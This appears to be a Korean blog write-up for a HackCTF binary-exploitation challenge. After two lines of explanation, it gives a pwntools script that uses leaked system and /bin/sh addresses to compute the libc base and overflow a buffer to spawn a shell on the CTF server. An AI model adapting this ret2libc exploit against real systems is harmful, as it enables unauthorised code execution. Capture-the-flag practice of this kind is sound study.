binsh 랑 system함수를 알려주지만 binsh는 bss 주소이므로
system 함수를 이용해 libc_base를 구해서 rop를 하면된다
from pwn import *
r = remote('ctf.j0n9hyun.xyz', 3018)
r.recvuntil(': ')
binsh = int(r.recv(10), 16)
print(hex(binsh))
system = int(r.recv(10), 16)
print(hex(system))
libc_base = system - 0x03a940
binsh = libc_base + 0x15902b
payload = 'A'*136
payload += p32(system)
payload += 'AAAA'
payload += p32(binsh)
r.sendline('A')
r.sendline(payload)
r.interactive()
'HackCTF' 카테고리의 다른 글
| HackCTF - UAF (0) | 2021.11.26 |
|---|---|
| HackCTF - Pwning (0) | 2021.11.22 |
| HackCTF - Look at me (0) | 2021.11.22 |
| HackCTF - Beginner_Heap (0) | 2021.11.22 |
| HackCTF - RTL_Core (0) | 2021.11.21 |
